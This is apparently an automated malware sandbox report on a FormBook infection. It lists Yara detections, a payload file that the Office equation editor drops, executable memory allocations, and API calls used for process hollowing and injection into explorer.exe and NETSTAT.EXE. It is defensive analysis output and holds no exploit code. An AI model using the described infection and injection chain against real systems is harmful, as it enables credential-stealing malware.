Source: explorer.exe, 0000000D.00000000.2130596438.0000000008471000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2145801175.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2106078286.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2369459750.0000000000490000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000001.2105788438.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2196489051.0000000002360000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2369501738.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.2369263188.00000000000D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.2145829902.0000000000530000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 9_2_00220110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,ExitProcess,	9_2_00220110
Source: C:\Users\Public\vbc.exe	Code function: 11_2_004181C0 NtCreateFile,	11_2_004181C0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00418270 NtReadFile,	11_2_00418270
Source: C:\Users\Public\vbc.exe	Code function: 11_2_004182F0 NtClose,	11_2_004182F0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_004183A0 NtAllocateVirtualMemory,	11_2_004183A0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_004181BA NtCreateFile,	11_2_004181BA
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041826A NtReadFile,	11_2_0041826A
Source: C:\Users\Public\vbc.exe	Code function: 11_2_004182EB NtClose,	11_2_004182EB
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00730078 NtResumeThread,LdrInitializeThunk,	11_2_00730078
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,	11_2_00730048
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007300C4 NtCreateFile,LdrInitializeThunk,	11_2_007300C4
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007307AC NtCreateMutant,LdrInitializeThunk,	11_2_007307AC
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072F900 NtReadFile,LdrInitializeThunk,	11_2_0072F900
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072F9F0 NtClose,LdrInitializeThunk,	11_2_0072F9F0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,	11_2_0072FAE8
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_0072FAD0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_0072FB68
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,	11_2_0072FBB8
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,	11_2_0072FC60
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_0072FC90
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_0072FDC0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FD8C NtDelayExecution,LdrInitializeThunk,	11_2_0072FD8C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	11_2_0072FED0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,	11_2_0072FEA0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FFB4 NtCreateSection,LdrInitializeThunk,	11_2_0072FFB4
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00730060 NtQuerySection,	11_2_00730060
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007310D0 NtOpenProcessToken,	11_2_007310D0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00731148 NtOpenThread,	11_2_00731148
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073010C NtOpenDirectoryObject,	11_2_0073010C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007301D4 NtSetValueKey,	11_2_007301D4
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072F8CC NtWaitForSingleObject,	11_2_0072F8CC
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00731930 NtSetContextThread,	11_2_00731930
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072F938 NtWriteFile,	11_2_0072F938
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FA50 NtEnumerateValueKey,	11_2_0072FA50
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FA20 NtQueryInformationFile,	11_2_0072FA20
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FAB8 NtQueryValueKey,	11_2_0072FAB8
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FB50 NtCreateKey,	11_2_0072FB50
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FBE8 NtQueryVirtualMemory,	11_2_0072FBE8
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00730C40 NtGetContextThread,	11_2_00730C40
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FC48 NtSetInformationFile,	11_2_0072FC48
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FC30 NtOpenProcess,	11_2_0072FC30
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FD5C NtEnumerateKey,	11_2_0072FD5C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00731D80 NtSuspendThread,	11_2_00731D80
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FE24 NtWriteVirtualMemory,	11_2_0072FE24
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FF34 NtQueueApcThread,	11_2_0072FF34
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0072FFFC NtCreateProcessEx,	11_2_0072FFFC
Source: C:\Users\Public\vbc.exe	Code function: 11_1_004181C0 NtCreateFile,	11_1_004181C0
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00418270 NtReadFile,	11_1_00418270
Source: C:\Users\Public\vbc.exe	Code function: 11_1_004182F0 NtClose,	11_1_004182F0
Source: C:\Users\Public\vbc.exe	Code function: 11_1_004183A0 NtAllocateVirtualMemory,	11_1_004183A0
Source: C:\Users\Public\vbc.exe	Code function: 11_1_004181BA NtCreateFile,	11_1_004181BA
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041826A NtReadFile,	11_1_0041826A
Source: C:\Users\Public\vbc.exe	Code function: 11_1_004182EB NtClose,	11_1_004182EB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C00C4 NtCreateFile,LdrInitializeThunk,	14_2_020C00C4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C07AC NtCreateMutant,LdrInitializeThunk,	14_2_020C07AC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFAB8 NtQueryValueKey,LdrInitializeThunk,	14_2_020BFAB8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_020BFAD0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFAE8 NtQueryInformationProcess,LdrInitializeThunk,	14_2_020BFAE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFB50 NtCreateKey,LdrInitializeThunk,	14_2_020BFB50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFB68 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_020BFB68
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFBB8 NtQueryInformationToken,LdrInitializeThunk,	14_2_020BFBB8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BF900 NtReadFile,LdrInitializeThunk,	14_2_020BF900
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BF9F0 NtClose,LdrInitializeThunk,	14_2_020BF9F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_020BFED0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFFB4 NtCreateSection,LdrInitializeThunk,	14_2_020BFFB4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFC60 NtMapViewOfSection,LdrInitializeThunk,	14_2_020BFC60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFD8C NtDelayExecution,LdrInitializeThunk,	14_2_020BFD8C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFDC0 NtQuerySystemInformation,LdrInitializeThunk,	14_2_020BFDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C0048 NtProtectVirtualMemory,	14_2_020C0048
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C0060 NtQuerySection,	14_2_020C0060
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C0078 NtResumeThread,	14_2_020C0078
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C10D0 NtOpenProcessToken,	14_2_020C10D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C010C NtOpenDirectoryObject,	14_2_020C010C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C1148 NtOpenThread,	14_2_020C1148
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C01D4 NtSetValueKey,	14_2_020C01D4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFA20 NtQueryInformationFile,	14_2_020BFA20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFA50 NtEnumerateValueKey,	14_2_020BFA50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFBE8 NtQueryVirtualMemory,	14_2_020BFBE8
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BF8CC NtWaitForSingleObject,	14_2_020BF8CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BF938 NtWriteFile,	14_2_020BF938
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C1930 NtSetContextThread,	14_2_020C1930
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFE24 NtWriteVirtualMemory,	14_2_020BFE24
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFEA0 NtReadVirtualMemory,	14_2_020BFEA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFF34 NtQueueApcThread,	14_2_020BFF34
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFFFC NtCreateProcessEx,	14_2_020BFFFC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFC30 NtOpenProcess,	14_2_020BFC30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFC48 NtSetInformationFile,	14_2_020BFC48
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C0C40 NtGetContextThread,	14_2_020C0C40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFC90 NtUnmapViewOfSection,	14_2_020BFC90
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020BFD5C NtEnumerateKey,	14_2_020BFD5C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020C1D80 NtSuspendThread,	14_2_020C1D80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E81C0 NtCreateFile,	14_2_000E81C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E8270 NtReadFile,	14_2_000E8270
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E82F0 NtClose,	14_2_000E82F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E83A0 NtAllocateVirtualMemory,	14_2_000E83A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E81BA NtCreateFile,	14_2_000E81BA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E826A NtReadFile,	14_2_000E826A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_000E82EB NtClose,	14_2_000E82EB

Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023E05A	9_2_0023E05A
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0022A1FB	9_2_0022A1FB
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0022A200	9_2_0022A200
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023DA6F	9_2_0023DA6F
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023CAA2	9_2_0023CAA2
Source: C:\Users\Public\vbc.exe	Code function: 9_2_0023D2CF	9_2_0023D2CF
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00224327	9_2_00224327
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00224330	9_2_00224330
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00224550	9_2_00224550
Source: C:\Users\Public\vbc.exe	Code function: 9_2_002225D0	9_2_002225D0
Source: C:\Users\Public\vbc.exe	Code function: 9_2_00222714	9_2_00222714
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00401030	11_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00401174	11_2_00401174
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041CABA	11_2_0041CABA
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00408C5B	11_2_00408C5B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041C4CF	11_2_0041C4CF
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041BD5B	11_2_0041BD5B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0041B502	11_2_0041B502
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00402D87	11_2_00402D87
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00402D90	11_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00402FB0	11_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0075905A	11_2_0075905A
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00743040	11_2_00743040
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0076D005	11_2_0076D005
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073E0C6	11_2_0073E0C6
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007E1238	11_2_007E1238
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073E2E9	11_2_0073E2E9
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0078A37B	11_2_0078A37B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00747353	11_2_00747353
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00742305	11_2_00742305
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007663DB	11_2_007663DB
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073F3CF	11_2_0073F3CF
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0077D47D	11_2_0077D47D
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00775485	11_2_00775485
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00751489	11_2_00751489
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00786540	11_2_00786540
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0074351F	11_2_0074351F
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0075C5F0	11_2_0075C5F0
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007E2622	11_2_007E2622
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0074E6C1	11_2_0074E6C1
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00744680	11_2_00744680
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007757C3	11_2_007757C3
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0074C7BC	11_2_0074C7BC
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007C579A	11_2_007C579A
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0076286D	11_2_0076286D
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0074C85C	11_2_0074C85C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007DF8EE	11_2_007DF8EE
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007C5955	11_2_007C5955
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007569FE	11_2_007569FE
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007429B2	11_2_007429B2
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007E098E	11_2_007E098E
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007F3A83	11_2_007F3A83
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00767B00	11_2_00767B00
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0073FBD7	11_2_0073FBD7
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007CDBDA	11_2_007CDBDA
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007ECBA4	11_2_007ECBA4
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0074CD5B	11_2_0074CD5B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00770D3B	11_2_00770D3B
Source: C:\Users\Public\vbc.exe	Code function: 11_2_007DFDDD	11_2_007DFDDD
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0075EE4C	11_2_0075EE4C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00772E2F	11_2_00772E2F
Source: C:\Users\Public\vbc.exe	Code function: 11_2_0076DF7C	11_2_0076DF7C
Source: C:\Users\Public\vbc.exe	Code function: 11_2_00750F3F	11_2_00750F3F
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00401030	11_1_00401030
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00401174	11_1_00401174
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041CABA	11_1_0041CABA
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00408C5B	11_1_00408C5B
Source: C:\Users\Public\vbc.exe	Code function: 11_1_00408C60	11_1_00408C60
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041C4CF	11_1_0041C4CF
Source: C:\Users\Public\vbc.exe	Code function: 11_1_0041BD5B	11_1_0041BD5B
Source: C:\Windows\explorer.exe	Code function: 13_2_029348F9	13_2_029348F9
Source: C:\Windows\explorer.exe	Code function: 13_2_029372FF	13_2_029372FF
Source: C:\Windows\explorer.exe	Code function: 13_2_02939062	13_2_02939062
Source: C:\Windows\explorer.exe	Code function: 13_2_0293B5B2	13_2_0293B5B2
Source: C:\Windows\explorer.exe	Code function: 13_2_0293A7C7	13_2_0293A7C7
Source: C:\Windows\explorer.exe	Code function: 13_2_02934902	13_2_02934902
Source: C:\Windows\explorer.exe	Code function: 13_2_02937302	13_2_02937302
Source: C:\Windows\explorer.exe	Code function: 13_2_02935362	13_2_02935362
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02171238	14_2_02171238
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020CE2E9	14_2_020CE2E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D2305	14_2_020D2305
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D7353	14_2_020D7353
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0211A37B	14_2_0211A37B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_021763BF	14_2_021763BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020CF3CF	14_2_020CF3CF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020F63DB	14_2_020F63DB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020FD005	14_2_020FD005
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D3040	14_2_020D3040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020E905A	14_2_020E905A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020CE0C6	14_2_020CE0C6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0211A634	14_2_0211A634
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02172622	14_2_02172622
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D4680	14_2_020D4680
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020DE6C1	14_2_020DE6C1
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0215579A	14_2_0215579A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020DC7BC	14_2_020DC7BC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_021057C3	14_2_021057C3
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0210D47D	14_2_0210D47D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020E1489	14_2_020E1489
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02105485	14_2_02105485
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D351F	14_2_020D351F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02116540	14_2_02116540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020EC5F0	14_2_020EC5F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02183A83	14_2_02183A83
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020F7B00	14_2_020F7B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0217CBA4	14_2_0217CBA4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0215DBDA	14_2_0215DBDA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020CFBD7	14_2_020CFBD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020DC85C	14_2_020DC85C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020F286D	14_2_020F286D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0216F8EE	14_2_0216F8EE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02155955	14_2_02155955
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0217098E	14_2_0217098E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020D29B2	14_2_020D29B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020E69FE	14_2_020E69FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_02102E2F	14_2_02102E2F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_020EEE4C	14_2_020EEE4C
